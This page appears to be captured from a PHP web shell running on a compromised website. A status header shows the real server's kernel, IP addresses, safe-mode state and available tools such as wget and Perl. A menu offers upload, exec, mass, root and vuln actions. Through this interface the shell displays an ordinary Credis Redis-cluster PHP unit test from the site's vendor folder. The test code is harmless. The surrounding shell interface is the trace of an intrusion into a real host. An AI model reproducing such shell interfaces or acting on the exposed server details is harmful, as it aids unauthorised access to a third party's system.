Kernel : Linux vmw02p.internet-indee.net 4.18.0-348.2.1.el8_5.x86_64 #1 SMP Tue Nov 16 14:42:35 UTC 2021 x86_64
Disable function : NONE
Safe mode : OFF
Host : firofichi.it | Server ip : 5.196.164.15 | Your ip : 3.147.78.250 | Time @ Server : 19 Oct 2024 07:16:01
MySQL : OFF | MSSQL : OFF | cURL : ON | Oracle : OFF | wget : ON | Perl : ON

/home/webmaster/firofichi/www/vendor/colinmollenhour/credis/tests/

HOME about upload exec mass file domain root vuln newfile newfolder kill me

File Path : /home/webmaster/firofichi/www/vendor/colinmollenhour/credis/tests/CredisStandaloneClusterTest.php

<?php require_once dirname(__FILE__).'/CredisClusterTest.php'; class CredisStandaloneClusterTest extends CredisClusterTest { protected $useStandalone = TRUE; protected function tearDown() { if($this->cluster) { foreach($this->cluster->clients() as $client){ if($client->isConnected()) { $client->close(); } } $this->cluster = NULL; } } public function testMasterSlave() { $this->tearDown(); $this->cluster = new Credis_Cluster(array($this->redisConfig[0],$this->redisConfig[6]), 2, $this->useStandalone); $this->assertTrue($this->cluster->client('master')->set('key','value')); $this->waitForSlaveReplication(); $this->assertEquals('value',$this->cluster->client('slave')->get('key')); $this->assertEquals('value',$this->cluster->get('key')); $this->setExpectedExceptionShim('CredisException','READONLY You can\'t write against a read only slave.'); $this->cluster->client('slave')->set('key2','value'); } }